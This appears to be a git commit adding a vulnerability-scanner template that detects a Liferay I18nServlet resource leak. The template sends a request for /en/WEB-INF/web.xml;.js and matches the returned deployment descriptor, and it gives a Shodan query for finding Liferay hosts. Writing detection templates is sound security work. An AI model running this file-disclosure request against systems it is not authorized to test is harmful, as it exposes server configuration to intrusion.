Create liferay-resource-leak.yaml
parent
fa01f55a73
commit
1d1b95fd89
|
@ -0,0 +1,36 @@
|
|||
id: liferay-resource-leak
|
||||
|
||||
info:
|
||||
name: Liferay - Resource leakage through I18nServlet
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
description: |
|
||||
I18n Servlet leaks information by sending an HTTP request to /[language]/[resource];.js (also .jsp works).
|
||||
remediation: Update Liferay to the latest version
|
||||
reference:
|
||||
- https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Liferay"
|
||||
tags: liferay,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/en/WEB-INF/web.xml;.js"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "<web-app id"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/xml"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue